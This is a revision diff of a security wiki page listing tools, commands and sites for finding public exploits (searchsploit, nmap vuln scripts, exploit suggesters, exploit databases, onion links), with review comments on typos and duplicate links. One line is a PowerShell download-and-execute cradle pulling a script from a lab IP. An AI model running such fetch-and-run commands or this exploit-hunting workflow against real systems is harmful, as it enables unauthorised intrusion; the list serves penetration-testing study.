This page shows you the differences between the selected revision and the current version of the page.
trouver_des_exploits_publique [2019/09/12 16:25] M0N5T3R |
trouver_des_exploits_publique [2023/10/01 22:32] (Current version) M0N5T3R |
Line 1: | Line 1: | ||
- | [Exploit and Vulnerability Database ] | + | FIXME **The PAD for proposing an improvement to this page:** https://pad.zenk-security.com/p/merci |
+ | |||
+ | |||
+ | ====== [Exploit and Vulnerability Database ] ====== | ||
============================= | ============================= | ||
+ | |||
+ | **offline:** | ||
+ | |||
+ | * a tool like searchsploit, but one that searches both exploit-db and https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns | ||
+ | * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf | ||
+ | * -> git clone https://github.com/offensive-security/exploit-database.git | ||
+ | * -> apt update && apt -y install exploitdb | ||
+ | * -> searchsploit -u #update | ||
+ | * -> searchsploit "linux Kernel"--exclude="(PoC)|/dos/" #Example | ||
+ | * -> searchsploit apache mod_ssl #Other example | ||
+ | * -> searchsploit -m 7618 #Paste the exploit in current directory | ||
+ | * -> searchsploit -p 7618[.c] #Show complete path | ||
+ | * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit | ||
+ | * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result | ||
+ | * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result | ||
+ | * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml | ||
+ | * -> searchsploit -x --nmap resultat.xml | ||
+ | |||
+ | |||
+ | |||
+ | * MSF-Search | ||
+ | * -> msf> search platform:windows port:135 target:XP type:exploit | ||
+ | |||
+ | * Nmap vulners | ||
+ | * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443 | ||
+ | |||
+ | |||
+ | * Nmap vuln | ||
+ | * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1 | ||
+ | |||
+ | * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | ||
+ | * -> https://github.com/rasta-mouse/Sherlock | ||
+ | * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns" | ||
+ | * -> wait a few minutes | ||
+ | |||
+ | |||
+ | * Windows Exploit Suggester | ||
+ | * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester | ||
+ | * -> pip install xlrd --upgrade | ||
+ | * -> apt install python3-xlrd | ||
+ | * -> ./windows-exploit-suggester.py --update | ||
+ | * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt | ||
+ | |||
+ | |||
+ | |||
+ | * Windows Exploit Suggester - Next Generation (WES-NG) | ||
+ | * -> git clone https://github.com/bitsadmin/wesng.git | ||
+ | * -> python wes.py --update | ||
+ | * -> python wes.py sysinfoTarget.txt | ||
+ | * List only vulnerabilities with exploits, excluding IE, Edge and Flash | ||
+ | * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash | ||
+ | * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash | ||
+ | * Only show vulnerabilities of a certain impact | ||
+ | * -> wes.py systeminfo.txt - -impact "Remote Code Execution" | ||
+ | * -> wes.py systeminfo.txt -i "Remote Code Execution" | ||
+ | * -> wes.py systeminfo.txt -i "Elevation of Privilege" | ||
+ | * Only show vulnerabilities of a certain severity | ||
+ | * -> wes.py systeminfo.txt --severity critical important | ||
+ | * -> wes.py systeminfo.txt -s critical | ||
+ | |||
+ | |||
+ | * Linux Exploit Suggester 2 | ||
+ | * -> git clone https://github.com/jondonas/linux-exploit-suggester-2 | ||
+ | |||
+ | * LES: Linux privilege escalation auditing tool | ||
+ | * -> git clone https://github.com/mzet-/linux-exploit-suggester | ||
+ | |||
+ | |||
+ | |||
+ | **online:** | ||
+ | |||
+ | * https://cn-sec.com/?s=CVE | ||
+ | * https://snyk.io/vuln | ||
+ | * http://www.securityfocus.com/ | ||
+ | * https://www.cvedetails.com/ | ||
* https://www.exploit-db.com/ | * https://www.exploit-db.com/ | ||
* https://www.exploit-db.com/google-hacking-database/ | * https://www.exploit-db.com/google-hacking-database/ | ||
+ | |||
+ | * -> firefox --search "Microsoft Edge site:exploit-db.com" | ||
+ | * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser | ||
+ | * https://srcincite.io/exploits/ | ||
+ | * https://www.exploitalert.com/ | ||
+ | * https://github.com/qazbnm456/awesome-cve-poc | ||
+ | * https://github.com/yeahhub/awesome-cve-poc | ||
+ | * https://vulners.com/ | ||
* https://sploitus.com/ | * https://sploitus.com/ | ||
* -> https://github.com/rejoinder/sploitus-search | * -> https://github.com/rejoinder/sploitus-search | ||
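Review bot: two of the added command lines carry shell typos: `wes.py systeminfo.txt - -impact "Remote Code Execution"` has a space inside the long flag and should read `--impact` (the `-i` short form on the following line is the intended equivalent), and `searchsploit "linux Kernel"--exclude="(PoC)|/dos/"` is missing the space before `--exclude`. In the Windows Exploit Suggester block, `pip install xlrd --upgrade` and `apt install python3-xlrd` install the same dependency twice; one of the two is enough.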
Line 11: | Line 98: | ||
* pastebin.com | * pastebin.com | ||
* -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html | * -> http://pastehits.blogspot.com/2013/03/pastebincom-custom-search.html | ||
- | * https://www.cvedetails.com/ | + | * -> https://pastebeen.com |
- | * https://google/ | + | * -> https://psbdmp.cc/ https://psbdmp.ws/ |
* Tor | * Tor | ||
* -> http://xmh57jrzrnw6insl.onion/ | * -> http://xmh57jrzrnw6insl.onion/ | ||
* -> http://hss3uro2hsxfogfq.onion/ | * -> http://hss3uro2hsxfogfq.onion/ | ||
* -> http://gjobqjj7wyczbqie.onion/ | * -> http://gjobqjj7wyczbqie.onion/ | ||
+ | * -> https://ahmia.fi/ | ||
* https://threatpost.com/ | * https://threatpost.com/ | ||
* https://www.deepdotweb.com/ | * https://www.deepdotweb.com/ | ||
* https://packetstormsecurity.com/ | * https://packetstormsecurity.com/ | ||
- | * https://www.cvedetails.com/ | ||
* http://routerpwn.com/ | * http://routerpwn.com/ | ||
* https://www.rapid7.com/db/ | * https://www.rapid7.com/db/ | ||
- | * http://0day.today/ | + | * http://0day.today/ **not recommended** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread on the forum]] |
* https://cve.mitre.org/cve/ | * https://cve.mitre.org/cve/ | ||
* http://www.exploitalert.com | * http://www.exploitalert.com | ||
* http://www.vulnerability-lab.com | * http://www.vulnerability-lab.com | ||
- | * https://packetstormsecurity.com | ||
* https://www.rapid7.com/db/ | * https://www.rapid7.com/db/ | ||
* http://it.0day.today | * http://it.0day.today | ||
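Review bot: this hunk removes the duplicated `https://www.cvedetails.com/` and `https://packetstormsecurity.com` entries but leaves other duplicates in place: `https://www.rapid7.com/db/` is still listed twice within this hunk, and `http://www.exploitalert.com` repeats the `https://www.exploitalert.com/` entry added to the online list above. Consider deduplicating in the same pass.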
Line 35: | Line 121: | ||
* https://www.kb.cert.org/vuls | * https://www.kb.cert.org/vuls | ||
* https://secunia.com/community/advisories/search/ | * https://secunia.com/community/advisories/search/ | ||
- | * http://www.securityfocus.com/bid | ||
* http://lwn.net/Vulnerabilities/ | * http://lwn.net/Vulnerabilities/ | ||
* https://www.owasp.org/index.php/Category:Vulnerability | * https://www.owasp.org/index.php/Category:Vulnerability | ||
Line 43: | Line 128: | ||
* http://lab.mediaservice.net | * http://lab.mediaservice.net | ||
* http://www.intelligentexploit.com | * http://www.intelligentexploit.com | ||
- | * https://github.com/yeahhub/awesome-cve-poc | + | * http://osvdb.org/ |
+ | * https://wpvulndb.com/ | ||
+ | * http://repwn.com/wiki.html | ||
+ | * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available. | ||
+ | * https://cveapi.com/ cveapi - free API for CVE data. | ||
+ | * http://securityvulns.com/ | ||
+ | * http://insecure.org/sploits_all.html | ||
+ | * http://zerodayinitiative.com/advisories/published/ | ||
+ | * http://nmrc.org/pub/index.html | ||
+ | * http://oval.mitre.org | ||
- | Write-up : | + | **Finding more information regarding the exploit ** |
- | * https://pentester.land/list-of-bug-bounty-writeups.html | + | * http://www.cvedetails.com |
+ | * http://packetstormsecurity.org/files/cve/[CVE] | ||
+ | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] | ||
+ | * http://www.vulnview.com/cve-details.php?cvename=[CVE] | ||
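Review bot: replacing the `Write-up :` heading drops the `https://pentester.land/list-of-bug-bounty-writeups.html` link without moving it elsewhere; if the write-ups section is meant to go, say so, otherwise keep the link under its own heading. The new `**Finding more information regarding the exploit **` heading also has a stray space before the closing `**`, which DokuWiki will not render as bold, and `http://osvdb.org/` is added although OSVDB has been offline since 2016.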